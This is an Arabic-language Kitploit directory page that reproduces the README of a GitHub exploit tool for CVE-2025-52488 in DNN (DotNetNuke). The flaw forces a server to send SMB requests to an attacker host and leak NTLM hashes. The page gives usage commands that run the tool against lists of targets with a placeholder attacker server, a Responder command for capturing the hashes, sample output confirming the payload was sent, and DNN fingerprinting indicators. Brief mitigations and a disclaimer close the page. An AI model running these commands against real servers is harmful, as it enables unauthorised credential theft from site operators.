Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-52488 — يستهدف هذا الاستغلال ثغرة أمنية في إصدارات DNN (المعروفة سابقًا باسم DotNetNuke) من 6.0.0 حتى ما قبل 10.0.1، والتي تتيح للمهاجمين كشف تجزئات NTLM عبر هجمات تطبيع المسار بنظام Unicode. | Kitploit
أدوات/GitHubGitHub/sh4den/cve-2025-52488
الاستطلاعهجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلومات
GitHubsh4den/cve-2025-52488

CVE-2025-52488

يستهدف هذا الاستغلال ثغرة أمنية في إصدارات DNN (المعروفة سابقًا باسم DotNetNuke) من 6.0.0 حتى ما قبل 10.0.1، والتي تتيح للمهاجمين كشف تجزئات NTLM عبر هجمات تطبيع المسار بنظام Unicode.

عرض المستودع
21منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال كشف تجزئة NTLM عبر تطبيع مسار Unicode في DNN (CVE-2025-52488)

نظرة عامة

يستهدف هذا الاستغلال ثغرة في إصدارات DNN (المعروفة سابقًا باسم DotNetNuke) من 6.0.0 إلى ما قبل 10.0.1، والتي تسمح للمهاجمين بكشف تجزئات NTLM عبر هجمات تطبيع مسار Unicode.

تفاصيل الثغرة

  • معرف CVE: CVE-2025-52488
  • الشدة: عالية (CVSS 8.6)
  • الإصدارات المتأثرة: من 6.0.0 إلى ما قبل 10.0.1
  • ناقل الهجوم: الشبكة
  • المصادقة: غير مطلوبة

آلية العمل

يستغل هذا الاستغلال الخصائص الشاذة في Windows/.NET وتطبيع Unicode لإجبار خادم DNN الهدف على إرسال طلبات SMB إلى خادم يتحكم فيه المهاجم، مما قد يؤدي إلى كشف تجزئات NTLM أثناء عملية المصادقة.

المتطلبات الأساسية

  1. Python 3.7+
  2. الحزم المطلوبة (ثبّتها باستخدام pip install -r requirements.txt)
  3. خادم SMB لالتقاط تجزئات NTLM (مثل Responder أو Burp Collaborator)

الاستخدام

الاستخدام الأساسي

root@kitploit:~
python main.py targets.txt attacker.example.com

مع معاملات مخصصة

root@kitploit:~
python main.py targets.txt 192.168.1.100 -t 20 --timeout 15

الوسائط

  • targets: ملف يحتوي على قائمة مضيفات DNN (مضيف واحد لكل سطر)
  • smb_server: اسم مضيف/عنوان IP لخادم SMB لالتقاط تجزئات NTLM
  • -t, --threads: عدد الخيوط المتزامنة (الافتراضي: 10)
  • --timeout: مهلة الطلب بالثواني (الافتراضي: 10)

تنسيق ملف الأهداف

أنشئ ملفًا نصيًا يحتوي على عناوين URL للأهداف، سطر واحد لكل هدف:

root@kitploit:~
http://target1.example.com
https://target2.example.com:8080
target3.example.com

إعداد خادم SMB

يمكنك استخدام أدوات مثل Responder لالتقاط تجزئات NTLM:

root@kitploit:~
responder -I eth0 -wrf

أو استخدم Burp Collaborator للكشف خارج النطاق.

مثال على المخرجات

root@kitploit:~
[2025-01-XX-XX:XX:XX] [INFO] Starting DNN NTLM hash disclosure exploit against 5 targets
[2025-01-XX-XX:XX:XX] [INFO] SMB Server: attacker.example.com
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] DNN indicator found: dnn_IsMobile
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] File upload endpoint accessible
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] Exploit payload sent successfully
[2025-01-XX-XX:XX:XX] [INFO] [target1.com] Check your SMB server for incoming NTLM authentication attempts

مؤشرات الاكتشاف

يبحث الاستغلال عن المؤشرات التالية المتعلقة بـ DNN:

  • ملف تعريف الارتباط dnn_IsMobile
  • dotnetnuke في الاستجابة
  • dnnconnect في الاستجابة
  • DNN Platform في الاستجابة

التخفيف

  • قم بتحديث DNN إلى الإصدار 10.0.1 أو أحدث
  • نفّذ ضوابط على مستوى الشبكة لمنع طلبات SMB إلى الخوادم الخارجية
  • راقب محاولات رفع الملفات المشبوهة

إخلاء مسؤولية

هذه الأداة مخصصة للأغراض التعليمية واختبارات الأمان المصرح بها فقط. استخدمها بمسؤولية وفقط على الأنظمة التي تمتلكها أو لديك إذن صريح لاختبارها.

المراجع

  • CVE-2025-52488
  • Assetnote Research
تنزيل الأداة